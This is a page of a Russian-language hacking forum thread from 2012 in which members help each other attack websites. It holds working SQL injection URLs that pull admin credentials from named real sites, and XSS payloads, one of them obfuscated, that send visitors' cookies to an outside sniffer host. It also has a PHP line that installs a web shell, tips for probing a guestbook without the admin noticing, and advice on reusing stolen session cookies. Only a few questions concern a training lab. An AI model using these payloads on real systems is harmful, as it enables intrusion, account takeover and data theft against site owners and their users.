PDA

Просмотр полной версии : Ваши вопросы по уязвимостям.


Страницы : 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 [78] 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98

NZT
12.01.2012, 21:44
О , большое спасибо за обяснения , теперь я понял то что написано в статьях , что пасивная это get , адресная строка а активная post в гостевой например. Спасибо )

M_script
12.01.2012, 21:54
NZT, полностью ответить на твой вопрос не смогу, потому что просто не понял его формулировки.

Экранирование кавычек никак не защищает от XSS. Единственное, где экранирование может помешать атаке, это внутри переменной JS при фильтрации угловых скобок и/или слеша.

Конструкция "document.write('" не имеет смысла. JS-код создает тег, который нужен, чтобы выполнить JS-код?


(new Image()).src='http://httpz.ru/123.gif?'+escape(document.cookie);




document.write('');

Чакэ
12.01.2012, 22:09
NZT said:
О , большое спасибо за обяснения , теперь я понял то что написано в статьях , что пасивная это get , адресная строка а активная post в гостевой например. Спасибо )


нет. пассивная может быть не только get или post, суть её в том что нужно каждый раз передавать в уязвимый параметр свой скрипт. активная же один раз записывается где-то , в бд например, и дальше уже «работает самостоятельно».

NZT
12.01.2012, 22:27
Чакэ Спасибо понял , тоесть чтобы пасивная сработала надо чтобы жертва нажала на ссылку , и только при нажатии на ссылку будут высылаться куки , а не при каждом захождении на страницу.

M_script, написал скрипт как ты написал но куки не пришли , может потому что в адресной строке этого сайта куда бы я не заходил нет значения id . Все строки адресов только такие http://localhost/denwer/dvwa/vulnerabilities/xss_s/ . В этом дело?

А если я в гостевой пишу то что ты написал то у меня в первом случае появляется как ты и написал , слово в слово а во втором случае document.write(\'\');

тоесть Ereee пошутил сказав что не получится xss на medium ? но у меня ничего не получается (чтоб я не писал алерт не выскакивает , а я все надписи в статье перепробывал)) Или он не шутил? Я делаю все как написано в статье для новичков но ничего в medium не получается. Для medium нужно уже читать более продвинутые статьи?

M_script
12.01.2012, 22:55
а во втором случае document.write(\'\');


В таком виде нормально должно быть:

document.write(atob(/PGltZyBzcmM9Imh0dHA6Ly9odHRwei5ydS8xMjMuZ2lmPw==/.source)+escape(document[/co/.source+/okie/.source])+atob(/Ij4=/.source));

trololoman96
12.01.2012, 23:14
тоесть Ereee пошутил сказав что не получится xss на medium ? но у меня ничего не получается (чтоб я не писал алерт не выскакивает , а я все надписи в статье перепробывал)) Или он не шутил? Я делаю все как написано в статье для новичков но ничего в medium не получается. Для medium нужно уже читать более продвинутые статьи?


на медиуме прокатывает такая штука, как в XSS reflected так и в XSS stored


Code:
ipt>alert(/xss/)

в XSS reflected, там просто замена идет


PHP:
echo'Hello '.str_replace('','',$_GET['name']);

в XSS stored тоже самое считай, только фильтруется переменная $message а $name все той же заменой фильтрует.

NZT
13.01.2012, 00:00
Наверное вышла новая версия в которой ничего не ломается ))

M_script , trololoman96 , спасибо вам за желание помочь , я уже рад что у меня на low что то получилось , но на медиуме все что вы написали тоже не работает, может у меня что то не так. Единственое что , если кто знает в какой из таких площадок для взлома есть пасивная , а не активная xss, хочу ее испробовать , но не охота все подряд качать и проверять , если кто знает насчет пасивной xss вы мне облегчите задачу.

И в чем разница между xss reflected и stored , у меня только в stored все работало а в reflected ничего не получилось.

trololoman96
13.01.2012, 00:10
И в чем разница между xss reflected и stored , у меня только в stored все работало а в reflected ничего не получилось.


тут имеется ввиду xss reflected как пассивная и сторед как активная. В reflected, xss пиши в имени, и перед этим либо через оперу отредактируй исходник и убери ограничение в input'е на 10 символов, либо на лету через temper data уже пиши свою xss и все получится

NZT
13.01.2012, 00:17
trololoman96, ты мне очень помог , я как раз искал пасивную xss. Ограничение у меня не стоит. Продолжу тренироваться . Спасибо.

faza02
13.01.2012, 02:32
Code:
http://www.dun[google]glac.org/index.php?m=module2&v=detailarticle&id=86&ia=1636+and+1=0+union+select+1,2,3,unhex(hex(colum n_name)),5,6,7,8,9,10,11,12,13+from+information_sc hema.columns+where+table_name=0x74626c5f61646d696e +limit+0,1--

таблица tbl_admin

помогите только именно с этим запросом

trololoman96
13.01.2012, 02:58
там нет таблицы tbl_admin, поэтому ошибка и вылетает


Code:
http://www.dunglac.org/index.php?m=module2&v=detailarticle&id=86&ia=1636+and+1=0+union+select+1,2,3,concat_ws%280x3 a,user,pass%29,5,6,7,8,9,10,11,12,13+from+admin

faza02
13.01.2012, 10:55
Code:
http://anavar.ru/articls/?id=100+and+1=0+union+select+1,load_file('/home/www/zayts78/htdocs/includes/article_inc.php'),3,4,5,6,7--

тут прав не хватает, или я что-то не так делаю?

Expl0ited
13.01.2012, 11:05
faza02 said:

Code:
http://anavar.ru/articls/?id=100+and+1=0+union+select+1,load_file('/home/www/zayts78/htdocs/includes/article_inc.php'),3,4,5,6,7--

тут прав не хватает, или я что-то не так делаю?


с чего ты вообще взял что там file_priv?

faza02
13.01.2012, 11:25
я думал что если N, то будет ошибка

Expl0ited
13.01.2012, 12:43
faza02 said:
я думал что если N, то будет ошибка


функция load_file в случае неудачи во время открытия файла, возвращает null

justonline
13.01.2012, 17:26
Нашел в одном модуле для булки xss. Пассивную xss.

проблемы:

1) в гугл хроме не передает на снифер данные(остальные браузеры ок)

2) куки передаются такие - bblastvisit=1326457186;%20bblastactivity=0, а bbpasword и sessionhash нет. what the fuck?

M_script
13.01.2012, 17:36
1) В хроме и ИЕ >= 8 есть анти-XSS фильтр. Твой JS-код просто не выполняется

2) httpOnly

justonline
13.01.2012, 17:37
M_script said:
1) В хроме и ИЕ >= 8 есть анти-XSS фильтр. Твой JS-код просто не выполняется
2) httpOnly


1) только для xss В строке?

2) ?

+ можно ли при пассивной xss оформить перенаправление на другую страницу без js

shadowrun
13.01.2012, 19:46
have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'on'' at line 1
Select id, password, login, admin from `cosm_users` as ` where login='admin'' && admin='on'` where login='admin'' && admin='on'


вываливает, когда в админке в поле логина пишу admin' ... Что можно придумать?

Ereee
13.01.2012, 20:00
Code:
admin'or+1+and(select+1+from(select+count(*),conca t((select+password+from+cosm_users+limit+0,1),floo r(rand(0)*2))x+from+information_schema.tables+grou p+by+x)a)--+a

не?

shadowrun
13.01.2012, 20:05
Ereee said:
не?


не


You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'or+1+and(select+1+from(select+count(*),concat((se lect+password+from+cosm_users+l' at line 1
Select id, password, login, admin from `cosm_users` as ` where login='admin'+or+1+and(select+1+from(select+count( *),concat((select+password+from+cosm_users+limit+0 ,1),floor(rand(0)*2))x+from+information_schema.tab les+group+by+x)a)--+' && admin='on'` where login='admin'+or+1+and(select+1+from(select+count( *),concat((select+password+from+cosm_users+limit+0 ,1),floor(rand(0)*2))x+from+information_schema.tab les+group+by+x)a)--+' && admin='on'

Ereee
13.01.2012, 20:06
Все + замени на /**/, а коммент на /*. Убери кавычку и т.д.

d1v
13.01.2012, 20:12
shadowrun said:
не


можно попытаться обойти авторизацию, с помощью or 1=1,но тут нужно смотреть на примере. и ещё - я на 90% уверен, что на сайте есть инъекция и в get запросе.

shadowrun
13.01.2012, 20:17
Ereee said:
Все + замени на /**/, а коммент на /*. Убери кавычку и т.д.


почти прокатил теперь, ска на коммент маериться


syntax to use near '/*'


если без коммента, то


syntax to use near ''


Спасибо, подобрал .

shadowrun
13.01.2012, 21:00
Бле, не даром пятн 13

Теперь, когда пытаюсь вывести login пишет следующую хрень:


Warning: mysql_query() [function.mysql-query]: Unable to save result set in...
Subquery returns more than 1 row

Expl0ited
13.01.2012, 21:04
shadowrun said:
Бле, не даром пятн 13
Теперь, когда пытаюсь вывести login пишет следующую хрень:


LIMIT юзай

oODungVTOo
13.01.2012, 21:40
HElp SQli


Invalid SQL Query!


http://www.adult-images.net/view_comments.php?gal=-455' /*!union*/ /*!select*/ 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17-- -

Ereee
13.01.2012, 21:47
oODungVTOo said:
HElp SQli




Code:
http://www.adult-images.net/view_comments.php?gal=455'+and(select+1+from(selec t+count(*),concat((select+table_name+from+informat ion_schema.tables+limit+1,1),floor(rand(0)*2))x+fr om+information_schema.tables+group+by+x)a)--+1

Ctrl+A


Code:
Duplicate entry 'COLLATIONS1' for key 'group_key'

NZT
13.01.2012, 22:21
Скажите , меня интересует такой вопрос : пока я в гостевой ищю активную xss я вписываю разные вещи в поля чтобы найти xss, а редактировать свои сообщения нельзя , то даже когда я найду активную xss то админ гостевой зайдет и увидит кучу разных подозрительных сообщений которые я писал чтобы найти xss и прикроет дырку, и я не смогу этим ничего сделать. И даже пользователи что то заподозрят. Как можно искать активную xss незаметно чтобы обойтись только одним сообщением?(если нельзя редактировать) и чтобы никто ничего не заметил. Я вот это понять не могу. Заранее спасибо за ответ.

shadowrun
14.01.2012, 00:39
Expl0ited said:
LIMIT юзай


Можно подробней?

d1v
14.01.2012, 01:12
shadowrun said:
Можно подробней?


кол-во возвращаемых строк при подобном запросе должно быть не больше 1ого. скорее всего ты пытаешься вывести логин не используя лимит и база отдаёт бОльшее кол-во строк, вызывая ошибку.


admin'or+1+and(select+1+from(select+count(*),conca t((select+login+from+cosm_users+
limit+0,1
),floor(rand(0)*2))x+from+information_schema.table s+grou p+by+x)a)--+a


limit+0,1 при выводе логина, ты скорее всего упустил.

shadowrun
14.01.2012, 01:43
d1v said:
кол-во возвращаемых строк при подобном запросе должно быть не больше 1ого. скорее всего ты пытаешься вывести логин не используя лимит и база отдаёт бОльшее кол-во строк, вызывая ошибку.
limit+0,1 при выводе логина, ты скорее всего упустил.


Нет. Все есть.

Ereee
14.01.2012, 12:48
shadowrun said:
Нет. Все есть.




Code:
admin'or+1+and(select+1+from(select+count(*),conca t((select+password+from+cosm_users+where+login='ad min'),floor(rand(0)*2))x+from+information_schema.t able s+group+by+group+by+x)a)--+a

Др. вариантов не вижу.

--

Помогите и мне! Как вывести таблицы:


Code:
http://www.ozerna[notforgoogle]ya42.ru/credit/form/LADA/Priora%204D/**/14'-9999.9+union+select+1,2,3,version(),5,6,7--+f

"_" заменяет на пробел кажется или я что-то не так делаю?

M_script
14.01.2012, 14:02
NZT said:
Как можно искать активную xss незаметно чтобы обойтись только одним сообщением?(если нельзя редактировать) и чтобы никто ничего не заметил. Я вот это понять не могу. Заранее спасибо за ответ.


Для начала написать любое сообщение и определить, где оно выводится на странице.

1) Если вне HTML-тегов, достаточно проверить фильтрацию символа [B]

NZT
14.01.2012, 17:38
M_script большое тебе спасибо за отзыв, я его перечитал наверное раз 10 и я понял следущее но не уверен что я правильно все понял.

1)Ты имеешь виду если собшение обычное без добавок html то надо написать

2)Если то что я написал в кавычках осталось в исходном коде то нашел xss , если заменилось то всеравно может быть xss , хоть в статье для новичков я читал что если кавычки заменились то это облом.

2.1) если в исходном коде пусто то проверить символы &lt и &gt

3)Потом в скрипте с алертом вместо <> вписать &lt , &gt , если скрипт напишется в сообщении значит есть xss , да он не выполняется но все же будут видеть то что я написал. И если вмето замененых кавычек появятся обычные значит пробовать вписать скрипт с обычными кавычками.

3.1) Если в скрипте фильтруются

M_script
14.01.2012, 18:43
Примеры:

1)


XSS


Символы (, ), = никто фильтровать не будет. Закрывать тег необязательно. Если проходит


[/QUOTE]
" if author else f"


[B]


YWxlcnQoJ1hTUycp - alert('XSS') в base64.

2)





Даже если кавычка экранируется





2.1)





В зависимости от функции-обрабочика может вообще не потребоваться обход фильтров. Но если какая-либо фильтрация мешает, можно использовать хтмл-сущности символов.





В myfunction() содержимое value передается как alert("test").

3)



a = 'XSS';
b = 'blablabla';
c = myfunction(a, b);



Закрываем строку, вставляем свой код.



a = '
[B]';alert('test');b='
';
b = 'blablabla';
c = myfunction(a, b);



Тег script можно закрыть даже внутри строки.



a = '
[B]


3.1)



text = 'XSS';
document.write('' + text + '');






text = '
[B]\x3Cscript\x3Ealert\x28\x27test\u0027\u0029\u003C\ u002Fscript\u003E
';
document.write('' + text + '');



Это лишь несколько общих примеров. Тема достаточно обширная и об этом можно написать еще много всего.


NZT said:
И это же получается не одно сообщение или подругому никак?


Расположение текста в коде можно посмотреть по чужим текстам, если до тебя кто-то уже писал на странице.


NZT said:
возможна ли в DVWA, xss на уровне high а то у меня ничего не получается )


Ни разу не пробовал проходить DVWA

Ereee
14.01.2012, 18:51
faza02 said:
пахекал сайт, стал искать админку
нашел пару подозрительных файлов, открываю — шелл
попытался с него залиться, редактировать файлы, создавать папки — никак
могу только просматривать
есть вомзможность выполнять произвольный php код, но это мало чем помогло, загрузка файлов не работает
sm off
права есть
drwxrwxrwx на все папки
поискал юзера и пасс от бд
он ведь в wp-config.php находится?
не расшифровал
ну собстенно вопрос в том, что можно сделать?


Еслить можно выполнять код + папки на запись, то какая проблема?


PHP:
copy("http://site.ltd/wso.txt","/home/www/123.php");

P.S. В wp-config.php пасс хранится в открытом виде.

NZT
14.01.2012, 20:18
M_script спасибо, я не много что понял из твоего последнего сообщения но ты меня навел на мысль что может уже кто то использовал html-теги до меня как и мне всего лишь надо заглянуть в source странички и проверить где возможна xss. Но , я тренируюсь в DVWA и там в уровне low проходит alert() , а вот в уровне medium не проходит и надо писать ript>alert()ript> но когда я это пишу чтобы проверить как мне вписать боевой скрипт мне выдает в коментарии ript> , это работает но появился подозрительный коментарий, можно ли этого как то избежать ? И скажи может ты знаешь , возможна ли в DVWA, xss на уровне high а то у меня ничего не получается ) А чтобы понять больше я думаю знания и опыт придут со временем, ведь я не собираюсь отступать )

Ты за несколько сообщений уже многому меня научил чего я абсолютно не знал и не догадывался. Спасибо.

trololoman96
15.01.2012, 07:25
а вот в уровне medium не проходит и надо писать ript>alert()ript> но когда я это пишу чтобы проверить как мне вписать боевой скрипт мне выдает в коментарии ript> , это работает но появился подозрительный коментарий, можно ли этого как то избежать ?


Я уже писал выше, там нужно


Code:
ript>alert()

потому что вырезает только а не трогает.


И скажи может ты знаешь , возможна ли в DVWA, xss на уровне high а то у меня ничего не получается ) А чтобы понять больше я думаю знания и опыт придут со временем, ведь я не собираюсь отступать )


Именно в том случае xss нет. Но возможность обойти htmlspecialchars() есть только в том случае если уязвимый параметр выводится в ссылке и кодировка файла UTF-7.

Bahamut
15.01.2012, 12:38
как залить файл если работает Put Method ?

Ereee
15.01.2012, 14:26
Bahamut said:
как залить файл если работает Put Method ?


Никак, если нет обработчика.

Bahamut
15.01.2012, 16:35
Ereee said:
Никак, если нет обработчика.


а где можно про это прочитать, просто сканер говорит что залил этим методом файл

Ereee
15.01.2012, 16:38
Bahamut said:
а где можно про это прочитать, просто сканер говорит что залил этим методом файл


Сканер говорит умеет?))) ЖеСтЬ! Эти всякие методы нужны, когда в определенную папку не пускают, например при:

..

Можно обойти авторизацию, отправив POST запрос.

NZT
15.01.2012, 19:42
Вставить один символ в сообщение, не вызвав подозрений, очень просто. Но делать это нужно так, чтобы сообщение не искажало вид страницы в случае наличия уязвимости.


M_script ты имеешь виду чтобы такого небыло :

http://i28.fastpic.ru/thumb/2012/0115/3e/b4c55e9afea885eee55ad372d8866a3e.jpeg (http://fastpic.ru/view/28/2012/0115/b4c55e9afea885eee55ad372d8866a3e.jpg.html)

Это появляется когда я в строке name пишу

img = new Image(); img.src = "http://httpz.ru/n6gmto41z00.gif?"+document.cookie;

, а вот source :

Name: test
Message: This is a test comment.
Name: img = new Image(); img.src = "http://httpz.ru/n6gmto41z00.gif?"+document.cookie;



Я как не пытался это исправить чтобы name и message были на разных строчках у меня не получилось , подскажи что нужно написать чтобы message был на строчку ниже.


Я уже писал выше, там нужно
ript>alert()
потому что вырезает только а не трогает.


trololoman96 я это понимаю , но для того чтобы узнать что вырезается а что нет мне надо попробовать ript>alert()ript> , и тогда я уже знаю что писать , но ведь когда я это пробую то в сообщении появляется слово ript> : http://i31.fastpic.ru/thumb/2012/0115/da/21ae4c027009d8579c53a2c470e515da.jpeg (http://fastpic.ru/view/31/2012/0115/21ae4c027009d8579c53a2c470e515da.jpg.html) , и это уже вызовет у админа подозрение что здесь что то не так, правильно я думаю? Можно ли как то узнать что писать подругому , чтобы не вызвать подозрений , или все так делают и пофиг что будет и пофиг что страница искажается (как в первой части сообщения) или всетаки надо все делать акуратно ?

И еще вопрос , как xss работает? Я делаю xss и получаю куки всех зарегестрированых на сайте пользователей, теперь у меня свободный доступ к их аккаунтам . до какого времени? пока админ не прикроет дыру или пока пользователь не сменит пароль? Как это все работает? Спасибо за ответы )

Ereee
15.01.2012, 22:01
В HTML:

[QUOTE="None"]

NZT
15.01.2012, 22:14
А если он просекет что там был скрипт который ворует куки , он может что то сделать чтобы я не зашел под админом ? Или ему этого не избежать?

Ereee
15.01.2012, 22:18
NZT said:
А если он просекет что там был скрипт который ворует куки , он может что то сделать чтобы я не зашел под админом ? Или ему этого не избежать?


Если сайт на заказ делали и админ ничего незнает, кроме как создание/редактирование новостей, то не узнает. Если опытный тру админ, то он по ссылке не перейдет, даже если перешел перелогинится(чтоб украденные куки были негодны) и зафиксить уязвимость.

winstrool
15.01.2012, 22:18
Можно удалить сесию, (корректно выйти из админки) или удалить сесию на серваке, и ваши куки вам не помогут.

NZT
15.01.2012, 23:58
Понял. Большое спасибо за ответы.

faza02
16.01.2012, 15:44
права в папке есть, на правку, залив

но почему-то ничего не льется и не редактируется

сервер виндосовский

2ereee, это уже другой

pirat0
17.01.2012, 01:07
http://www.toytricksy.com/?a=index

проконсультируйте это пхп инъекцыя иль нет??

d1v
17.01.2012, 01:17
pirat0 said:
http://www.toytricksy.com/?a=index
проконсультируйте это пхп инъекцыя иль нет??


нет. это ошибка подключения другого файла, который не передаётся в параметре.

AnGeI
17.01.2012, 01:41
http://ckk.sakh.com/interface.php?file=


Инклуд с фильтром:


PHP:
import_request_variables('GPC');

if (strstr($file,'..') ||strstr($file,'//') ||strstr($file,'http')

||strstr($file,'interface') ) exit;



Есть ли там где-то еще читалка, с помощью которой этот код можно получить? (код получен не мною)

justonline
17.01.2012, 02:46
http://www.sitc.ru/index.php?id=90000512

тиц 350

blind sql.

реально такое раскрутить? без information_schema то

trololoman96
17.01.2012, 06:22
Реально, также брутишь таблицы, колонки и через блайнд забираешь инфу. И еще, там не слепая инъекция:


Code:
http://www.sitc.ru/index.php?id=90000512%27+and+5=4+union+select+1,2, 3,4,5,version%28%29,7,8,9,10,11,12,13--+

-----------------------

AnGeI, думаю стоит копать в сторону соседних сайтов. Вот сайн на том же сервере

http://cdut.sakh.com/phpmyadmin/ - открытый phpmyadmin (setup.php нету)

есть инъекция, только толку от нее нет особого


Code:
http://cdut.sakh.com/?view=forum&fid=-2161%27+union+select+1,2,3,4,5,6--+

есть рабочий инклуд


Code:
http://cdut.sakh.com/?nauka=index&project=../../avatars/0.gif%00

залить аватару свою не удалось, там вылетает ошибка с open_basedir. Так что если найдешь что инклудить считай шел есть

Ну и доступ в админку, авторизация на самом сайте

...

Дальше копать лень, ибо все равно там ничего интересного нет, удачи

pirat0
18.01.2012, 00:48
http://rzva.ru/js/menu.php?language=russian' подскажите что можно сделать, а то чет не реагирует на запросы((

B1t.exe
18.01.2012, 02:16
Ребята, какая то мне не понятная ситуация ))

в одном сервере мне надо "выгрузить" (дампить) SQL базу и чтоб нормально читался

через бразуер когда открываю на сервере - получаю что то в роде шифрованного текста, пытался кодировку менять, но бестолку..

но там также есть конфиграционный файл, с логином и паролем типа такого:


Code:
mysql username = "logn"
mysql password = "password"

###

'1 list' table name = "rep1"
'reports' table name prefix = "rep2"
'2' table name = "h"

mysql db name = "NAME"
mysql host = "127.0.0.1"
mysql port = "3306"
mysql unix socket = "/var/run/mysqld/mysqld.sock"

### config end

помогите снять информацию !

Не пинать сильно, можно сказать не соображаю в этом деле )) особо в кодинге php/sql, по этому лучше посоветуйте как можно "автоматический" метод.

d1v
18.01.2012, 02:34
через бразуер когда открываю на сервере - получаю что то в роде шифрованного текста, пытался кодировку менять, но бестолку..


ты уже сделал дамп? что ты в браузере открываешь?

если сделал, то скачай его на винт и открывай не в браузере.

если нет, то найди пма, залогинись с данными из файла и сделай экспорт базы. возможные папки:

phpmyadmin

pma

myadmin, etc... гугли

если есть доступ к файлам, то поставь дампер какой-нить, например:

http://sypex.net/ru/products/dumper/downloads/

если есть доступ к консоли, то через mysqldump сделай:

http://dev.mysql.com/doc/refman/5.1/en/mysqldump.html

Boolean
18.01.2012, 06:50
pirat0 said:
http://rzva.ru/js/menu.php?language=russian' подскажите что можно сделать, а то чет не реагирует на запросы((


Там что-то типа


PHP:
$lang="";

if($_GET['language'] =='russian')$lang=1;

mysql_query("SELECT .. WHERE lang={$lang}AND ....");



Думаю что как-то так и выглядит код.

Инъекции нет.


AnGeI said:
Инклуд с фильтром:

PHP:
import_request_variables('GPC');

if (strstr($file,'..') ||strstr($file,'//') ||strstr($file,'http')

||strstr($file,'interface') ) exit;



Есть ли там где-то еще читалка, с помощью которой этот код можно получить? (код получен не мною)


Этот код просто написан по реакции скрипта на параметры, не более.


justonline said:
http://www.sitc.ru/index.php?id=90000512
тиц 350
blind sql.
реально такое раскрутить? без information_schema то


Где ты там Blind нашел?

http://www.sitc.ru/index.php?id=90000512%27%20and%201=3%20union%20sel ect%201,2,3,4,version%28%29,6,7,8,9,10,11,12,13%20--%201

Да, версия 4, обычный брут таблиц/колонок катит.

narviss
19.01.2012, 11:18
Эээ..идиотский фильтр

Дело в том, что фильтруется точка information_shema. так что information_shema никак ненапишешь...как обойти такой фильтр?

Konqi
19.01.2012, 11:20
narviss said:
Эмм...у меня фильтруется слово
information_shema.
как обойти такой фильтр?


пробуй разные регистры, пробуй /*!information_schema.tables*/

пробуй `information_scheme`.`tables`

stan0009
20.01.2012, 22:17
Помогите!

Товарищи!

Откровенно говоря задолбался

Начал тут познавать прелести xss.

Просканил сайт одного провайдера, нашел вот что:


PHP:
" onmouseover=prompt(903167) bad="

типо это xss, уязвимый параметр.

сканил WVS, с английским проблем особо нет, но тут я затупил.

мануалов не нашел, гугл мне не помог.

прошу вас мне пояснить как это использовать, и желательно не выходя из программы^^

PS: Знания веб хакинга есть, говорю ж осталось xss доучить

PSS единственное что нашел, как пример:


PHP:
http://www.acunetix.com/blog/web-security-zone/articles/web-vulnerabilities-pligg/

Ereee
20.01.2012, 22:21
2stan0009,

прочитай этот пост

КЛАЦ! (https://antichat.live/showpost.php/p/2985774/postcount/157/)

Вопросы должны отпасть.

stan0009
20.01.2012, 23:18
Ereee said:
2stan0009
,
прочитай этот пост
КЛАЦ! (https://antichat.live/showpost.php/p/2985774/postcount/157/)
Вопросы должны отпасть.


что-то похожее, но не в моем случае.

видел примеры таких xss типа такого запроса


PHP:
http://www.mil.be/def/index.asp?LAN=nl&FILE=contact_poc_confirm&pid=815&ID=0&IDT=0&IDS=1%22+onmouseover=alert(412439912585)+&PAGE=1

про кавычки все правильно сказано, а про остальное соотнести не могу

а еще...

может verb tampering проще?

кто нибудь встречался?

B1t.exe
21.01.2012, 04:06
Ребята, есть программа, с интерфейсом (понятно для новичнов) для того, чтоб проверил какие директории и файлы доступны для чтения ?

т.е. вбиваешь WEB адрес и он сканирует сайт и выдает отчет по файлам и папкам.

т.п. программы, как Acunetix Web Vulnerability Scanner не советовать, хочется менького и без лишних гемор.

Lilo
21.01.2012, 04:28
B1t.exe said:
Ребята, есть программа, с интерфейсом (понятно для новичнов) для того, чтоб проверил какие директории и файлы доступны для чтения ?
т.е. вбиваешь WEB адрес и он сканирует сайт и выдает отчет по файлам и папкам.
т.п. программы, как Acunetix Web Vulnerability Scanner не советовать, хочется менького и без лишних гемор.


ну гугл site: xxx.ru

самый простой вариант

B1t.exe
21.01.2012, 04:40
Lilo said:
ну гугл site: xxx.ru
самый простой вариант


да ну ) ты че..

Lilo
21.01.2012, 04:52
B1t.exe said:
да ну ) ты че..


Avalanche

Ereee
21.01.2012, 08:17
stan0009 said:
что-то похожее, но не в моем случае.
видел примеры таких xss типа такого запроса

PHP:
http://www.mil.be/def/index.asp?LAN=nl&FILE=contact_poc_confirm&pid=815&ID=0&IDT=0&IDS=1%22+onmouseover=alert(412439912585)+&PAGE=1

про кавычки все правильно сказано, а про остальное соотнести не могу
а еще...
может verb tampering проще?
кто нибудь встречался?


Verb Tampering? Забудь, сейчас таких уязвимостей мало(появился один с php, суть в том. что при передаче HEAD-ом php-скрипт выполнится до первого вывода инфы, что открывается баги). Твой WVS не сможет найти скульи без error-а, лучше всего с помощью WVS найти все скрипты, а шаманить уже самому. Насчет mil.be, у меня при твоем запросе перенаправляет. Чтобы отключить перенаправление, нужно отключить Javascript(XSS работать не будет), или отключить autoredirect(которое включено по умолчанию на всех браузерах).

2B1t.exe, информация об доступности на запись хранится на сервере, ты просто не сможешь этого сделать.

2Lilo,

narviss
21.01.2012, 10:22
Konqi said:
пробуй разные регистры, пробуй /*!information_schema.tables*/
пробуй `information_scheme`.`tables`


нет, неполучается...нужно чонить без точки=( каким запросом заменить можно?

Konqi
21.01.2012, 10:24
narviss said:
нет, неполучается...нужно чонить без точки=( каким запросом заменить можно?


точьку ничем не заменишь, попробуй urlencode, хотя врятли поможет

. = %2E

Ereee
21.01.2012, 10:29
narviss said:
нет, неполучается...нужно чонить без точки=( каким запросом заменить можно?


Как вариант, пробуй:

infOrmAtion_schEma./**/tabLeS

P.S. Обход точки невозможен. Придется угадать таблицы.

lightangel
21.01.2012, 12:29
I got the "order by" here.


Code:
https://www.unicef.org.hk/news/list_detail.php?id=234+order+by+17--+-

Now "union select" does not work.


Code:
https://www.unicef.org.hk/news/list_detail.php?id=234+union+select+1,2,3,4,5,6,7, 8,9,10,11,12,13,14,15,16,17--+-



Code:
https://www.unicef.org.hk/news/list_detail.php?id=234%27%20and%28select%201%20fro m%28select%20count%28*%29,concat%28%28select%20%28 selectconcat%280x7e,0x27,cast%28version%28%29%20as %20char%29,0x27,0x7e%29%29%20from%20information_sc hema.tables%20limit%200,1%29,floor%28rand%280%29*2 %29%29x%20frominformation_schema.tables%20group%20 by%20x%29a%29%20and%201=1+--+

Where is my fault now?

Faaax
21.01.2012, 17:30
что то не могу дальше вывести


Code:
http://www.lenta.cjes.ru/
?nid=1089' and (1)=(select 1 from(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)-- x

Ereee
21.01.2012, 17:34
2Faaax,


Code:
http://www.lenta.cjes.ru/?m=1&y=2012&lang=rus&nid=1089'+and(select+1+from(select+count(*),concat ((select+concat(table_name,0x00)+from+information_ schema.tables+limit+1,1),floor(rand(0)*2))x+from+i nformation_schema.tables+group+by+x)a)--+f

Результат:


Code:
Duplicate entry 'COLLATIONS' for key 1

jecka3000
21.01.2012, 23:29
Проблема с XSS. Пока что не хочу давать линк... проблема в том, что я хочу, чтоб при вводе в поиск вылетел алерт. Что я только не пробовал, но результат один и тот же:

ввожу alert(), нажимаю Ентер, в поиске остается alert() - вывод [B]">

Ereee
21.01.2012, 23:52
jecka3000 said:
Какие есть еще варианты?


Ссылку покажи.

_Spamer_
22.01.2012, 03:41
Code:
http://brandkom.com.ua/shop_content.php?coID=10

Есть уязвимость тут?

Ereee
22.01.2012, 08:33
_Spamer_ said:

Code:
http://brandkom.com.ua/shop_content.php?coID=10

Есть уязвимость тут?


Не думаю. Так как в твоем случаи:


Code:
+and+1=1 true
+and+1=0 true

Да и ничего не меняется при вставке кавычки.

M_script
22.01.2012, 15:31
jecka3000, вариантов очень много. Для начала надо определить, какие теги пропускает фильтр и в зависимости от этого использовать события. Все зависит от конкретного сайта. Скинь ссылку в личку, если не хочешь выкладывать в теме.

MadFun.
22.01.2012, 19:40
Подскажите, можно ли раскрутить данный баг?


Code:
http://stat.webyse.com/audience.php?id=1563

d1v
22.01.2012, 19:50
MadFun. said:
Подскажите, можно ли раскрутить данный баг?

Code:
http://stat.webyse.com/audience.php?id=1563



никак. из-за отсутсвия тэгов просто выпадает кусок js скрипта.

хотя там есть пассиваная хсс:


http://stat.webyse.com/audience.php?id=%3Cscript%3Ealert();%3C/script%3E


можешь попытаться выташить куки.

Qzen
23.01.2012, 11:51
Просканировал сайт Vulnerability сканером нашел уязвимость (ошибка Mysql при ?id=1'), havij позволяет просмотреть все таблицы. А вот в браузере эта ошибка не отображается. Не подскажите почему так?

зы. Извините за нубовский вопрос.

Unknown
23.01.2012, 12:07
В исходный код загляни, может там что найдешь. Ты уверен, что ошибка точно выводится?

Qzen
23.01.2012, 12:18
gl0w said:
В исходный код загляни, может там что найдешь. Ты уверен, что ошибка точно выводится?


В исходном коде сведений об ошибке нет. При вводе news.php?id=1' открывается просто страничка news.php

И havij, и vulnerability говорят что ошибка и с легкостью пользуются этой уязвимостью

Gorev
23.01.2012, 12:19
Qzen said:
В исходном коде сведений об ошибке нет. При вводе news.php?id=1' открывается просто страничка news.php
И havij, и vulnerability говорят что ошибка и с легкостью пользуются этой уязвимостью


пост запросы смотрел?

Qzen
23.01.2012, 12:24
Gorev said:
пост запросы смотрел?


Скорее всего там ошибка. Только в виду моей нубизны я не знаю как смотреть)

Не подскажите, может есть какое то дополнение на Firefox для просмотра?

Unknown
23.01.2012, 12:41
Gorev said:
пост запросы смотрел?


Врятли он отправлял POST запросы, там надо вручную указывать все параметры, а он не додумался бы )


Qzen said:
При вводе news.php?id=1' открывается просто страничка news.php


Попробуй выключить редирект

Qzen
23.01.2012, 12:53
gl0w said:
Врятли он отправлял POST запросы, там надо вручную указывать все параметры, а он не додумался бы )
Попробуй выключить редирект


Вот! Поставил оперу, отключил редирект и сработало. В ФФ почему то все равно перенаправлялось.

Спасибо.

Boolean
23.01.2012, 14:33
Qzen said:
